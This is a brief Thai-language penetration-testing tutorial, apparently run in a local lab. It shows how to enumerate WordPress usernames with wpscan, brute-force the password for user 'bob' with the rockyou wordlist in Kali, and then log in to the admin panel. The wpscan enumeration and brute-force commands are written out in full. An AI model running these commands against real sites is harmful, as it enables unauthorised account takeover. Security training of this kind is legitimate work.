เราสามารถรวบรวมข้อมูล username จาก website ที่ใช้งาน WordPress ที่มีช่องโหว่ (ควรอัพเดทเป็น version ล่าสุด จาก ณ ปัจจุบันคือ 5.x และปิดการใช้งาน Xmlrpc) โดยใช้คำสั่งดังนี้
wpscan --url http://192.168.1.54:8000 --enumerate u
จากตัวอย่างเราได้ username คือ bob จากนั้นเราสามารถใช้ password ที่ชื่อ rockyou ซึ่งมีอยู่แล้วใน kali ทำการแตกไว้ในที่ต้องการ จากตัวอย่างเอาไว้ที่ Desktop
เมื่อทราบ password list แล้วก็ใช้คำสั่งดังนี้เพื่อเดารหัสผ่าน
wpscan --url http://192.168.1.54:8000 -U 'bob' -P '/root/Desktop/rockyou.txt'
จากนั้นถ้าสำเร็จจะส่งผลดังนี้
พยายามหาหน้า login ของ admin จากผล scan ดังนี้
ทดลอง Login โดยใช้ username กับ password ที่ได้มา
